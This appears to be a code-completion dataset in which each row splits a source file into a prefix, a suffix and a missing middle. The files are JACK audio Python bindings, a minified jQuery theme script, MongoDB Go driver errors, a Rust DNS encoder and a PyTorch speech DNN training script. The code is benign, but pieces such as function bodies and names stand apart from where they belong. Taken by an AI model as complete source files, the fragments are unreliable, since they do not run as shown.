return self._hasflag(_lib.JackServerStarted)
@property
def server_failed(self):
"""Unable to connect to the JACK server."""
return self._hasflag(_lib.JackServerFailed)
@property
def server_error(self):
"""Communication error with the JACK server."""
return self._hasflag(_lib.JackServerError)
@property
def no_such_client(self):
"""Requested client does not exist."""
return self._hasflag(_lib.JackNoSuchClient)
@property
def load_failure(self):
"""Unable to load internal client."""
return self._hasflag(_lib.JackLoadFailure)
@property
def init_failure(self):
"""Unable to initialize client."""
return self._hasflag(_lib.JackInitFailure)
@property
def shm_failure(self):
"""Unable to access shared memory."""
return self._hasflag(_lib.JackShmFailure)
@property
def version_error(self):
"""Client's protocol version does not match."""
return self._hasflag(_lib.JackVersionError)
@property
def backend_error(self):
"""Backend error."""
return self._hasflag(_lib.JackBackendError)
@property
def client_zombie(self):
"""Client zombified failure."""
return self._hasflag(_lib.JackClientZombie)
def _hasflag(self, flag):
"""Helper function for Status properties."""
return bool(self._code & flag)
class TransportState(object):
"""Representation of the JACK transport state.
See Also
--------
`Client.transport_state`, :meth:`Client.transport_query`
"""
__slots__ = '_code'
def __init__(self, code):
self._code = code
def __eq__(self, other):
return self._code == other
def __repr__(self):
return 'jack.' + {
_lib.JackTransportStopped: 'STOPPED',
_lib.JackTransportRolling: 'ROLLING',
_lib.JackTransportStarting: 'STARTING',
_lib.JackTransportNetStarting: 'NETSTARTING',
}[self._code]
class JackError(Exception):
"""Exception for all kinds of JACK-related errors."""
pass
class CallbackExit(Exception):
"""To be raised in a callback function to signal failure.
See Also
--------
:meth:`Client.set_process_callback`
:meth:`Client.set_blocksize_callback`
:meth:`Client.set_samplerate_callback`
:meth:`Client.set_port_rename_callback`
:meth:`Client.set_graph_order_callback`
:meth:`Client.set_xrun_callback`
"""
pass
def position2dict(pos):
"""Convert CFFI position struct to a dict."""
assert pos.unique_1 == pos.unique_2
keys = ['usecs', 'frame_rate', 'frame']
if pos.valid & _lib.JackPositionBBT:
keys += ['bar', 'beat', 'tick', 'bar_start_tick', 'beats_per_bar',
'beat_type', 'ticks_per_beat', 'beats_per_minute']
if pos.valid & _lib.JackPositionTimecode:
keys += ['frame_time', 'next_time']
if pos.valid & _lib.JackBBTFrameOffset:
keys += ['bbt_offset']
if pos.valid & _lib.JackAudioVideoRatio:
keys += ['audio_frames_per_video_frame']
if pos.valid & _lib.JackVideoFrameOffset:
keys += ['video_offset']
return dict((k, getattr(pos, k)) for k in keys)
def version():
"""Get tuple of major/minor/micro/protocol version."""
v = _ffi.new('int[4]')
_lib.jack_get_version(v+0, v+1, v+2, v+3)
return tuple(v)
def version_string():
"""Get human-readable JACK version."""
return _ffi.string(_lib.jack_get_version_string()).decode()
def client_name_size():
"""Return the maximum number of characters in a JACK client name.
This includes the final NULL character. This value is a constant.
"""
return _lib.jack_client_name_size()
def port_name_size():
"""Maximum length of port names.
The maximum number of characters in a full JACK port name including
the final NULL character. This value is a constant.
A port's full name contains the owning client name concatenated with
a colon (:) followed by its short name and a NULL character.
"""
return _lib.jack_port_name_size()
def set_error_function(callback=None):
"""Set the callback for error message display.
Set it to ``None`` to restore the default error callback function
(which prints the error message plus a newline to stderr).
The *callback* function must have this signature::
callback(message: str) -> None
"""
_set_error_or_info_function(callback, _lib.jack_set_error_function)
def set_info_function(callback=None):
"""Set the callback for info message display.
Set it to ``None`` to restore the default info callback function
(which prints the info message plus a newline to stderr).
The *callback* function must have this signature::
callback(message: str) -> None
"""
_set_error_or_info_function(callback, _lib.jack_set_info_function)
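# Minimal usage sketch (nothing beyond the documented ``callback(message: str)``
# signature; assumes this module is imported as ``jack``):
#
#     import logging
#     jack.set_error_function(lambda msg: logging.error('JACK: %s', msg))
#     jack.set_info_function(lambda msg: logging.info('JACK: %s', msg))
#     jack.set_error_function()  # restore the default stderr printer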
def client_pid(name):
"""Return PID of a JACK client.
Parameters
----------
name : str
Name of the JACK client whose PID shall be returned.
Returns
-------
int
PID of *name*. If not available, 0 will be returned.
"""
return _lib.jack_get_client_pid(name.encode())
def _set_error_or_info_function(callback, setter):
"""Helper for set_error_function() and set_info_function()."""
if callback is None:
callback_wrapper = _ffi.NULL
else:
@_ffi.callback('void (*)(const char*)')
def callback_wrapper(msg):
callback(_ffi.string(msg).decode())
_keepalive[setter] = callback_wrapper
setter(callback_wrapper)
_keepalive = {}
def _check(error_code, msg):
"""Check error code and raise JackError if non-zero."""
if error_code:
raise JackError('{0} ({1})'.format(msg, error_code)) | err = _lib.jack_client_close(self._ptr)
self._ptr = _ffi.NULL
if not ignore_errors:
_check(err, 'Error closing JACK client') |
main.js | !function(t){"use strict";function e(){t(".local-video-container").find(".btn-play").on("click",function(){t(this).siblings(".image-holder").css("z-index",-1),t(this).css("opacity",0),t(this).siblings("video").get(0).play()})}function a(){window.sr=ScrollReveal();var t="section:not(.masonry):not(:first-of-type):not(.parallax):not(.bg-dark):not(.image-square)",e=1e3;window.sr.reveal(""+t,{viewFactor:.1,duration:""+e,scale:1,mobile:!1})}function i(){var e=t(".image-holder, .parallax");e.each(function(){t(this).attr("data-background")&&t(this).css("background-image","url("+t(this).data("background")+")")})}function n(){function e(){var t=h;if(0>=t)return s&&(s=!1,a.removeClass("fixed")),o&&(o=!1,a.removeClass("nav-hidden")),void(n&&(n=!1,a.removeClass("scrolled")));if(t>i){if(!n)return a.addClass("scrolled"),void(n=!0)}else t>i-200?(s||(a.addClass("fixed"),s=!0),t>i-100?o||(a.addClass("nav-hidden"),o=!0):o&&(o=!1,a.removeClass("nav-hidden"))):(s&&(s=!1,a.removeClass("fixed")),o&&(o=!1,a.removeClass("nav-hidden"))),n&&(n=!1,a.removeClass("scrolled"))}var a=t("body .nav-container nav:first"),i=(t("body .nav-container nav:first").outerHeight(),t("body section:nth-of-type(1)").first().outerHeight(!0)),n=!1,s=!1,o=!1;t("nav").hasClass("fixed")||t("nav").hasClass("absolute")||(t(".nav-container").css("min-height",t("nav").outerHeight(!0)),t(window).resize(function(){t(".nav-container").css("min-height",t("nav").outerHeight(!0))})),t("nav").hasClass("bg-dark")&&t(".nav-container").addClass("bg-dark"),window.pageYOffset>i&&t("nav").addClass("fixed").addClass("nav-hidden"),window.addEventListener("scroll",e,!1),t(".menu > li > ul").each(function(){var e=t(this).offset(),a=e.left+t(this).outerWidth(!0);if(a>t(window).width()&&!t(this).hasClass("mega-menu"))t(this).addClass("make-right");else if(a>t(window).width()&&t(this).hasClass("mega-menu")){var i=t(window).width()-e.left,n=t(this).outerWidth(!0)-i;t(this).css("margin-left",-n)}}),t(".mobile-toggle").on("click",function(){t(".nav-bar").toggleClass("nav-open"),t(this).toggleClass("active")}),t(".menu li").on("click",function(e){e||(e=window.event),e.stopPropagation(),t(this).find("ul").length?t(this).toggleClass("toggle-sub"):t(this).parents(".toggle-sub").removeClass("toggle-sub")}),t(".nav-block.nav-widget").on("click",function(){t(this).toggleClass("toggle-widget")}),t(".search-form input, .search-form button").on("click",function(t){t||(t=window.event),t.stopPropagation()}),t(".search-widget").on("click",function(e){t(".search-popup").fadeIn(),t(".search-popup input").focus(),t(".search-popup").on("click",function(e){t(".search-popup").fadeOut()}),e.preventDefault()}),t(".offscreen-toggle").on("click",function(){t(".nav-bar").toggleClass("exit"),t(".offscreen-cont").fadeToggle(),t(".offscreen-cont").toggleClass("nav-is-open")}),t(".offscreen-toggle").length&&addEventListener("scroll",function(){t(".offscreen-cont").hasClass("nav-is-open")&&(t(".nav-bar").toggleClass("exit"),t(".offscreen-cont").fadeToggle(),t(".offscreen-cont").toggleClass("nav-is-open"))},!1)}function s(){t(".gallery").magnificPopup({tLoading:"",gallery:{enabled:!0},mainClass:"mfp-fade"}),t(".magnific, .lightbox").magnificPopup({tLoading:""})}function o(){t(".tabbed-content").each(function(){t("li",this).eq(0).hasClass("active")&&t("li",this).eq(2).hasClass("active")&&t("li",this).eq(3).hasClass("active")&&t("li",this).eq(4).hasClass("active")||t("li",this).eq(0).addClass("active"),t(this).append('<ul class="content"></ul>')}),t(".tabs li").each(function(){var 
e=t(this),a="";e.is(".tabs>li:first-child")&&(a=' class="active"');var i=e.find(".tab-content").detach().wrap("<li"+a+"></li>").parent();e.closest(".tabbed-content").find(".content").append(i)}),t(".tabs li").on("click",function(){t(this).closest(".tabs").find("li").removeClass("active"),t(this).addClass("active");var e=t(this).index()+1;t(this).closest(".tabbed-content").find(".content>li").removeClass("active"),t(this).closest(".tabbed-content").find(".content>li:nth-of-type("+e+")").addClass("active")})}function l(){var e=[];t(".slider").each(function(){var e=t(this);if(e.find(".slides").length)return!0;var a=[];e.find(">*").length;e.children().each(function(e){a.push(t(this).wrap("li").parent())}),t('<ul class="slides"></ul>').append(a).appendTo(e)}),t(".slider").each(function(a){var i=t(this),n=t(this).find("ul.slides"),s=1,o=!1,l=!1,r=7e3,d=!1,c="fade",f=!0;o="true"==i.attr("data-arrows")?!0:!1,f="false"==i.attr("data-autoplay")?!1:!0,l="true"==i.attr("data-pagination")&&n.find("li").length>1?!0:!1,i.attr("data-timing")&&(r=i.attr("data-timing")),i.attr("data-items")&&(s=i.attr("data-items")),i.attr("data-animation")&&(c=i.attr("data-animation")),n.find("li").length>1&&(d=!0),n.addClass("owl-carousel"),e.push(n),e[a].owlCarousel({animateIn:!1,animateOut:!1,nav:o,dots:l,dotsSpeed:500,navSpeed:500,items:s,autoplay:f,autoplayTimeout:r,navText:!1,loop:d,mouseDrag:!0,responsive:{0:{items:1,nav:!1},768:{items:s}}})})}function r(){var e=t(".chartbox-bar-progress");e.length&&(t(window).width()>=768?e.eq(0).waypoint(function(){e.each(function(){var e=t(this);e.width(e.data("progress"))})},{offset:"95%"}):e.each(function(){var e=t(this);e.width(e.data("progress"))}))}function d(){p||t(".parallax").jarallax({speed:.2})}function c(){t(".tweets-feed").each(function(e){t(this).attr("id","tweets-"+e)}).each(function(e){function a(t){for(var a=t.length,i=0,n=document.getElementById("tweets-"+e),s='<ul class="slides">';a>i;)s+="<li>"+t[i]+"</li>",i++;return s+="</ul>",n.innerHTML=s,s}var i={id:t("#tweets-"+e).attr("data-widget-id"),dotId:"",maxTweets:t("#tweets-"+e).attr("data-amount"),enableLinks:!0,showUser:!0,showTime:!0,dateFunction:"",showRetweet:!1,customCallback:a};twitterFetcher.fetch(i)})}function f(){var e=t("html, body"),a=t(".local-scroll, .scroll-nav > li > a");a.on("click",function(a){var i=t.attr(this,"href"),n=0;return n="#go"===i?t("section:nth-of-type(2)").offset().top:n=t(i).offset().top,e.animate({scrollTop:n},1e3,"easeInCubic"),!1})}function u(){if(!p){var e=t(".counter");e.length&&e.counterUp({delay:10,time:800})}}var p;p=/Android|webOS|iPhone|iPad|iPod|BlackBerry/i.test(navigator.userAgent)?!0:!1;var h=0,g=!1;t(window).load(function(){t('[class*="transition-"]').addClass("transition-active"),t(".loader").addClass("loader-fade"),t(".masonry").each(function(){var e=t(this).find(".masonry-container");g=e,e.on("layoutComplete",function(){e.addClass("masonry-active")}),e.isotope({itemSelector:".masonry-item",masonry:{columnWidth:".masonry-item"}})}),t(".masonry-filters li").on("click",function(){var e=t(this),a=e.closest(".masonry").find(".masonry-container"),i="*";"*"!==e.attr("data-masonry-filter")&&(i=".filter-"+e.attr("data-masonry-filter")),t(".masonry-filters li").removeClass("active"),e.addClass("active"),a.removeClass("masonry-animate"),a.isotope({filter:i})})}),t(document).ready(function(){var p=!0,g=!0;if(addEventListener("scroll",function(){h=window.pageYOffset},!1),i(),p&&(t("ul.slides 
li").hasClass("parallax")?t("ul.slides").on("initialized.owl.carousel",function(){d()}):d()),g&&a(),l(),f(),e(),n(),s(),o(),r(),c(),u(),t(".masonry").each(function(){var e,a=t(this),i=a.find(".masonry-container"),n=a.find(".masonry-filters"),s="undefined"!=typeof n.attr("data-filter-all-text")?n.attr("data-filter-all-text"):"All";i.find(".masonry-item[data-masonry-filter]").length&&(n.append("<ul></ul>"),e=n.find("> ul"),e.append('<li class="active" data-masonry-filter="*">'+s+"</li>"),i.find(".masonry-item[data-masonry-filter]").each(function(){var a=t(this),i=a.attr("data-masonry-filter"),n=[];"undefined"!=typeof i&&""!==i&&(n=i.split(",")),jQuery(n).each(function(t,i){a.addClass("filter-"+i),e.find('[data-masonry-filter="'+i+'"]').length||e.append('<li data-masonry-filter="'+i+'">'+i+"</li>")})}))}),t('a:not(.lightbox):not(.gallery):not([href^="#"]):not([href^="tel"]):not([href^="mailto"]):not([href=""]):not([target="_blank"])').on("click",function(){t('[class*="transition-"]').removeClass("transition-active")}),document.querySelector("[data-maps-api-key]")&&!document.querySelector(".gMapsAPI")&&t("[data-maps-api-key]").length){var m=document.createElement("script"),v=t("[data-maps-api-key]:first").attr("data-maps-api-key");m.type="text/javascript",m.src="https://maps.googleapis.com/maps/api/js?key="+v+"&callback=initGoogleMaps",m.className="gMapsAPI",document.body.appendChild(m)}}),window.initGoogleMaps=function(){"undefined"!=typeof google&&"undefined"!=typeof google.maps&&t(".map-canvas[data-maps-api-key]").each(function(){var e,a,i,n=this,s="undefined"!=typeof t(this).attr("data-map-style")?t(this).attr("data-map-style"):!1,o=JSON.parse(s)||[{featureType:"landscape",stylers:[{saturation:-100},{lightness:65},{visibility:"on"}]},{featureType:"poi",stylers:[{saturation:-100},{lightness:51},{visibility:"simplified"}]},{featureType:"road.highway",stylers:[{saturation:-100},{visibility:"simplified"}]},{featureType:"road.arterial",stylers:[{saturation:-100},{lightness:30},{visibility:"on"}]},{featureType:"road.local",stylers:[{saturation:-100},{lightness:40},{visibility:"on"}]},{featureType:"transit",stylers:[{saturation:-100},{visibility:"simplified"}]},{featureType:"administrative.province",stylers:[{visibility:"off"}]},{featureType:"water",elementType:"labels",stylers:[{visibility:"on"},{lightness:-25},{saturation:-100}]},{featureType:"water",elementType:"geometry",stylers:[{hue:"#ffff00"},{lightness:-25},{saturation:-97}]}],l="undefined"!=typeof t(this).attr("data-map-zoom")&&""!==t(this).attr("data-map-zoom")?1*t(this).attr("data-map-zoom"):17,r="undefined"!=typeof t(this).attr("data-latlong")?t(this).attr("data-latlong"):!1,d=r?1*r.substr(0,r.indexOf(",")):!1,c=r?1*r.substr(r.indexOf(",")+1):!1,f=new google.maps.Geocoder,u="undefined"!=typeof t(this).attr("data-address")?t(this).attr("data-address").split(";"):!1,p="We Are Here",h=t(document).width()>766?!0:!1,g={draggable:h,scrollwheel:!0,zoom:l,disableDefaultUI:!0,styles:o};void 0!=t(this).attr("data-marker-title")&&""!=t(this).attr("data-marker-title")&&(p=t(this).attr("data-marker-title")),void 0!=u&&""!=u[0]?f.geocode({address:u[0].replace("[nomarker]","")},function(t,e){if(e==google.maps.GeocoderStatus.OK){var a=new google.maps.Map(n,g);a.setCenter(t[0].geometry.location),u.forEach(function(t){var e;if(i={url:void 0==window.mr_variant?"images/logotype/location.png":"../images/location.png",size:new google.maps.Size(30,48),scaledSize:new google.maps.Size(30,48)},/(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)/.test(t))var 
n=t.split(","),s=new google.maps.Marker({position:{lat:1*n[0],lng:1*n[1]},map:a,icon:i,title:p,optimised:!1});else t.indexOf("[nomarker]")<0&&(e=new google.maps.Geocoder,e.geocode({address:t.replace("[nomarker]","")},function(t,e){e==google.maps.GeocoderStatus.OK&&(s=new google.maps.Marker({map:a,icon:i,title:p,position:t[0].geometry.location,optimised:!1}))}))})}else console.log("There was a problem geocoding the address.")}):void 0!=d&&""!=d&&0!=d&&void 0!=c&&""!=c&&0!=c&&(g.center={lat:d,lng:c},e=new google.maps.Map(n,g),a=new google.maps.Marker({position:{lat:d,lng:c},map:e,icon:i,title:p}))})},initGoogleMaps(),t.extend(t.easing,{easeInCubic:function(t){return t*t*t}})}(jQuery); | ||
errors.go | // Copyright (C) MongoDB, Inc. 2017-present.
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may
// not use this file except in compliance with the License. You may obtain
// a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
package mongo
import (
"bytes"
"errors"
"fmt"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/x/mongo/driver"
"go.mongodb.org/mongo-driver/x/mongo/driver/topology"
"go.mongodb.org/mongo-driver/x/network/command"
"go.mongodb.org/mongo-driver/x/network/result"
)
// ErrUnacknowledgedWrite is returned from functions that have an unacknowledged
// write concern.
var ErrUnacknowledgedWrite = errors.New("unacknowledged write")
// ErrClientDisconnected is returned when a user attempts to call a method on a
// disconnected client
var ErrClientDisconnected = errors.New("client is disconnected")
// ErrNilDocument is returned when a user attempts to pass a nil document or filter
// to a function where the field is required.
var ErrNilDocument = errors.New("document is nil")
// ErrEmptySlice is returned when a user attempts to pass an empty slice as input
// to a function where the field is required.
var ErrEmptySlice = errors.New("must provide at least one element in input slice")
func replaceErrors(err error) error |
// CommandError represents an error in execution of a command against the database.
type CommandError struct {
Code int32
Message string
Labels []string
Name string
}
// Error implements the error interface.
func (e CommandError) Error() string {
if e.Name != "" {
return fmt.Sprintf("(%v) %v", e.Name, e.Message)
}
return e.Message
}
// HasErrorLabel returns true if the error contains the specified label.
func (e CommandError) HasErrorLabel(label string) bool {
if e.Labels != nil {
for _, l := range e.Labels {
if l == label {
return true
}
}
}
return false
}
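// Illustrative usage sketch (the label value is an assumption, not defined in
// this file): a caller that retries transient transaction errors might write
//
//	if ce, ok := err.(CommandError); ok && ce.HasErrorLabel("TransientTransactionError") {
//		// retry the transaction
//	}
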
// WriteError is a non-write concern failure that occurred as a result of a write
// operation.
type WriteError struct {
Index int
Code int
Message string
}
func (we WriteError) Error() string { return we.Message }
// WriteErrors is a group of non-write concern failures that occurred as a result
// of a write operation.
type WriteErrors []WriteError
func (we WriteErrors) Error() string {
var buf bytes.Buffer
fmt.Fprint(&buf, "write errors: [")
for idx, err := range we {
if idx != 0 {
fmt.Fprintf(&buf, ", ")
}
fmt.Fprintf(&buf, "{%s}", err)
}
fmt.Fprint(&buf, "]")
return buf.String()
}
func writeErrorsFromResult(rwes []result.WriteError) WriteErrors {
wes := make(WriteErrors, 0, len(rwes))
for _, err := range rwes {
wes = append(wes, WriteError{Index: err.Index, Code: err.Code, Message: err.ErrMsg})
}
return wes
}
// WriteConcernError is a write concern failure that occurred as a result of a
// write operation.
type WriteConcernError struct {
Code int
Message string
Details bson.Raw
}
func (wce WriteConcernError) Error() string { return wce.Message }
// WriteException is an error for a non-bulk write operation.
type WriteException struct {
WriteConcernError *WriteConcernError
WriteErrors WriteErrors
}
func (mwe WriteException) Error() string {
var buf bytes.Buffer
fmt.Fprint(&buf, "multiple write errors: [")
fmt.Fprintf(&buf, "{%s}, ", mwe.WriteErrors)
fmt.Fprintf(&buf, "{%s}]", mwe.WriteConcernError)
return buf.String()
}
func convertBulkWriteErrors(errors []driver.BulkWriteError) []BulkWriteError {
bwErrors := make([]BulkWriteError, 0, len(errors))
for _, err := range errors {
bwErrors = append(bwErrors, BulkWriteError{
WriteError{
Index: err.Index,
Code: err.Code,
Message: err.ErrMsg,
},
dispatchToMongoModel(err.Model),
})
}
return bwErrors
}
func convertWriteConcernError(wce *result.WriteConcernError) *WriteConcernError {
if wce == nil {
return nil
}
return &WriteConcernError{Code: wce.Code, Message: wce.ErrMsg, Details: wce.ErrInfo}
}
// BulkWriteError is an error for one operation in a bulk write.
type BulkWriteError struct {
WriteError
Request WriteModel
}
func (bwe BulkWriteError) Error() string {
var buf bytes.Buffer
fmt.Fprintf(&buf, "{%s}", bwe.WriteError)
return buf.String()
}
// BulkWriteException is an error for a bulk write operation.
type BulkWriteException struct {
WriteConcernError *WriteConcernError
WriteErrors []BulkWriteError
}
func (bwe BulkWriteException) Error() string {
var buf bytes.Buffer
fmt.Fprint(&buf, "bulk write error: [")
fmt.Fprintf(&buf, "{%s}, ", bwe.WriteErrors)
fmt.Fprintf(&buf, "{%s}]", bwe.WriteConcernError)
return buf.String()
}
// returnResult is used to determine if a function calling processWriteError should return
// the result or return nil. Since the processWriteError function is used by many different
// methods, both *One and *Many, we need a way to differentiate if the method should return
// the result and the error.
type returnResult int
const (
rrNone returnResult = 1 << iota // None means do not return the result ever.
rrOne // One means return the result if this was called by a *One method.
rrMany // Many means return the result if this was called by a *Many method.
rrAll returnResult = rrOne | rrMany // All means always return the result.
)
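// Illustrative reading of these flags (a sketch, not additional API): a *One
// method keeps its result only when rrOne is set in the returned value, e.g.
//
//	rr, err := processWriteError(wce, wes, err)
//	if rr&rrOne == 0 {
//		res = nil
//	}
//
// so rrAll (rrOne|rrMany) means every caller may return its result.
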
// processWriteError handles processing the result of a write operation. If the returnResult matches
// the calling method's type, it should return the result object in addition to the error.
// This function will wrap the errors from other packages and return them as errors from this package.
//
// WriteConcernError will be returned over WriteErrors if both are present.
func processWriteError(wce *result.WriteConcernError, wes []result.WriteError, err error) (returnResult, error) {
switch {
case err == command.ErrUnacknowledgedWrite:
return rrAll, ErrUnacknowledgedWrite
case err != nil:
return rrNone, replaceErrors(err)
case wce != nil || len(wes) > 0:
return rrMany, WriteException{
WriteConcernError: convertWriteConcernError(wce),
WriteErrors: writeErrorsFromResult(wes),
}
default:
return rrAll, nil
}
}
| {
if err == topology.ErrTopologyClosed {
return ErrClientDisconnected
}
if ce, ok := err.(command.Error); ok {
return CommandError{Code: ce.Code, Message: ce.Message, Labels: ce.Labels, Name: ce.Name}
}
return err
} |
dns.rs | use crate::encode::Encoder;
use crate::{Dns, EncodeResult, Flags};
impl Encoder {
pub(super) fn flags(&mut self, flags: &Flags) {
let mut buffer = 0u8;
if flags.qr {
buffer |= 0b1000_0000;
}
let opcode = flags.opcode.clone() as u8;
buffer |= opcode << 3;
if flags.aa {
buffer |= 0b0000_0100;
}
if flags.tc {
buffer |= 0b0000_0010;
}
if flags.rd {
buffer |= 0b0000_0001;
}
self.u8(buffer);
let mut buffer = 0u8;
if flags.ra {
buffer |= 0b1000_0000;
}
if flags.ad {
buffer |= 0b0010_0000;
}
if flags.cd {
buffer |= 0b0001_0000;
}
let rcode = flags.rcode.clone() as u8;
buffer |= rcode;
self.u8(buffer);
}
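    // Worked example (follows from the bit masks above): a message with
    // qr, rd and ra set, opcode = 0 and rcode = 0 encodes its two flag
    // bytes as 0b1000_0001 (0x81) and 0b1000_0000 (0x80).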
pub(super) fn | (&mut self, dns: &Dns) -> EncodeResult<()> {
self.u16(dns.id);
self.flags(&dns.flags);
self.u16(dns.questions.len() as u16);
self.u16(dns.answers.len() as u16);
self.u16(dns.authorities.len() as u16);
self.u16(dns.additionals.len() as u16);
for question in &dns.questions {
self.question(question)?;
}
for answer in &dns.answers {
self.rr(answer)?;
}
for authority in &dns.authorities {
self.rr(authority)?;
}
for additional in &dns.additionals {
self.rr(additional)?;
}
Ok(())
}
}
impl_encode_without_result!(Flags, flags);
impl_encode!(Dns, dns);
| dns |
02_train_dnn.py | # -*- coding: utf-8 -*-
#
# Trains the DNN.
#
# Import the modules needed for PyTorch processing
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from torch import optim
# Import the Dataset class we created
from my_dataset import SequenceDataset
# Import the numerical computation module (numpy)
import numpy as np
# Import the plotting module (matplotlib)
import matplotlib.pyplot as plt
# Import the MonoPhoneHMM class from hmmfunc.py
from hmmfunc import MonoPhoneHMM
# Import the model definition
from my_model import MyDNN
# Import the module for JSON input/output
import json
# Import the os, sys and shutil modules
import os
import sys
import shutil
#
# Main function
#
if __name__ == "__main__":
#
# Settings start here
#
# Feature list of the training data
train_feat_scp = \
'../01compute_features/mfcc/train_small/feats.scp'
# Label (alignment) file of the training data
train_label_file = \
'./exp/data/train_small/alignment'
# File with the feature means / standard deviations
# computed from the training data
mean_std_file = \
'../01compute_features/mfcc/train_small/mean_std.txt'
# Feature list of the development data
dev_feat_scp = \
'../01compute_features/mfcc/dev/feats.scp'
# Label (alignment) file of the development data
dev_label_file = \
'./exp/data/dev/alignment'
# HMM file
# The HMM file is used only to obtain the
# number of phones and states
hmm_file = '../03gmm_hmm/exp/model_3state_2mix/10.hmm'
# Directory to which the training results are written
output_dir = os.path.join('exp', 'model_dnn')
# Number of utterances per mini-batch
batch_size = 5
# Maximum number of epochs
max_num_epoch = 60
# Number of hidden layers
num_layers = 4
# Dimension of the hidden layers
hidden_dim = 1024
# splice: concatenate the features of the n preceding and following frames
# The feature dimension becomes (splice*2+1) times larger
splice = 5
# Initial learning rate
initial_learning_rate = 0.008
# Epoch at which learning-rate decay and
# early-stopping checks start
# (= training continues at least until this epoch,
# no matter how bad the validation results are)
lr_decay_start_epoch = 7
# Factor by which the learning rate is decayed
# (new learning rate <- current learning rate * lr_decay_factor)
# A value of 1.0 or larger disables the decay
lr_decay_factor = 0.5
# Early stopping threshold
# Training is stopped when the lowest loss has not
# been updated for this many consecutive epochs
early_stop_threshold = 3
#
# Settings end here
#
# Create the output directory if it does not exist
os.makedirs(output_dir, exist_ok=True)
# Put the settings into a dictionary
config = {'num_layers': num_layers,
'hidden_dim': hidden_dim,
'splice': splice,
'batch_size': batch_size,
'max_num_epoch': max_num_epoch,
'initial_learning_rate': initial_learning_rate,
'lr_decay_start_epoch': lr_decay_start_epoch,
'lr_decay_factor': lr_decay_factor,
'early_stop_threshold': early_stop_threshold}
# Save the settings in JSON format
conf_file = os.path.join(output_dir, 'config.json')
with open(conf_file, mode='w') as f:
json.dump(config, f, indent=4)
# Read the feature mean / standard deviation file
with open(mean_std_file, mode='r') as f:
# Read all lines
lines = f.readlines()
# Line 1 (0-based) is the mean vector (mean),
# line 3 is the standard deviation vector (std)
mean_line = lines[1]
std_line = lines[3]
# Convert to space-separated lists
feat_mean = mean_line.split()
feat_std = std_line.split()
# Convert to numpy arrays
feat_mean = np.array(feat_mean,
dtype=np.float32)
feat_std = np.array(feat_std,
dtype=np.float32)
# Copy the mean / standard deviation file
shutil.copyfile(mean_std_file,
os.path.join(output_dir, 'mean_std.txt'))
# Get the feature dimension
feat_dim = np.size(feat_mean)
# To determine the DNN output dimension,
# obtain the number of phones and states of the HMM
# Instantiate the MonoPhoneHMM class
hmm = MonoPhoneHMM()
# Load the HMM
hmm.load_hmm(hmm_file)
# The DNN output dimension is the number of phones x the number of states
dim_out = hmm.num_phones * hmm.num_states
# The value used to pad labels when building batches
# must be at least dim_out
pad_index = dim_out
# Create the neural network model
# The input feature dimension is
# feat_dim * (2*splice+1)
dim_in = feat_dim * (2*splice+1)
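# Worked example (the 13-dimensional MFCC is an assumption, not fixed by
# this script): with feat_dim = 13 and splice = 5,
# dim_in = 13 * (2*5 + 1) = 143.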
model = MyDNN(dim_in=dim_in,
dim_hidden=hidden_dim,
dim_out=dim_out,
num_layers=num_layers)
print(model)
# Define the optimizer
# Here we use stochastic gradient descent
# with momentum
optimizer = optim.SGD(model.parameters(),
lr=initial_learning_rate,
momentum=0.99)
# Create the dataset for the training data
# padding_index is set to a value of at least dim_out
train_dataset = SequenceDataset(train_feat_scp,
train_label_file,
feat_mean,
feat_std,
pad_index,
splice)
# Create the dataset for the development data
dev_dataset = SequenceDataset(dev_feat_scp,
dev_label_file,
feat_mean,
feat_std,
pad_index,
splice)
# Create the DataLoader for the training data
# The training data are shuffled
# (a larger num_workers speeds up processing but puts
# more load on the machine; choose it according to
# the specs of your PC)
train_loader = DataLoader(train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=4)
# Create the DataLoader for the development data
# The development data are not shuffled
dev_loader = DataLoader(dev_dataset,
batch_size=batch_size,
shuffle=False,
num_workers=4)
# Use cross-entropy as the loss function
criterion = \
nn.CrossEntropyLoss(ignore_index=pad_index)
# Place the model parameters on the GPU if CUDA is
# available, otherwise on the CPU
if torch.cuda.is_available():
device = torch.device('cuda')
else:
device = torch.device('cpu')
model = model.to(device)
# Set the model to training mode
model.train()
# Put the training and development loaders into a dictionary
# so both phases can be handled by a simple for loop
dataset_loader = {'train': train_loader,
'validation': dev_loader}
# History of the loss and error rate for each epoch
loss_history = {'train': [],
'validation': []}
error_history = {'train': [],
'validation': []}
# This program keeps the model whose validation loss
# is lowest, so remember the lowest loss and the
# corresponding model and epoch
best_loss = -1
best_model = None
best_epoch = 0
# Early stopping flag; training stops once it becomes True
early_stop_flag = False
# Counter for the early stopping check (how many consecutive
# epochs the lowest loss has not been updated)
counter_for_early_stop = 0
# Prepare the log file
log_file = open(os.path.join(output_dir,
'log.txt'),
mode='w')
log_file.write('epoch\ttrain loss\t'\
'train err\tvalid loss\tvalid err')
# Loop over the epochs
for epoch in range(max_num_epoch):
# If the early stop flag is set,
# stop training
if early_stop_flag:
print(' Early stopping.'\
' (early_stop_threshold = %d)' \
% (early_stop_threshold))
log_file.write('\n Early stopping.'\
' (early_stop_threshold = %d)' \
% (early_stop_threshold))
break
# Print the epoch number
print('epoch %d/%d:' % (epoch+1, max_num_epoch))
log_file.write('\n%d\t' % (epoch+1))
# Run the train phase and the validation phase alternately
for phase in ['train', 'validation']:
# Accumulated loss and number of utterances in this epoch
total_loss = 0
total_utt = 0
# Accumulated number of misrecognized frames and total frames in this epoch
total_error = 0
total_frames = 0
# Take one mini-batch at a time from the DataLoader
# of the current phase and process it,
# repeating until all mini-batches are done.
# Each mini-batch contains the speech features,
# labels, numbers of frames, label lengths
# and utterance IDs
for (features, labels, feat_len,
label_len, utt_ids) \
in dataset_loader[phase]:
# Place the data on the GPU if CUDA is
# available, otherwise on the CPU
features, labels = \
features.to(device), labels.to(device)
# Reset the gradients
optimizer.zero_grad()
# Compute the model output (forward pass)
outputs = model(features)
# At this point outputs is a 3-D tensor of shape
# [batch size, number of frames, number of labels].
# CrossEntropyLoss expects a 2-D tensor of shape
# [number of samples, number of labels],
# so reshape it with view
b_size, f_size, _ = outputs.size()
outputs = outputs.view(b_size * f_size,
dim_out)
# labels is a 2-D tensor of shape [batch size, frames].
# CrossEntropyLoss expects a 1-D tensor of shape
# [number of samples], so reshape it with view.
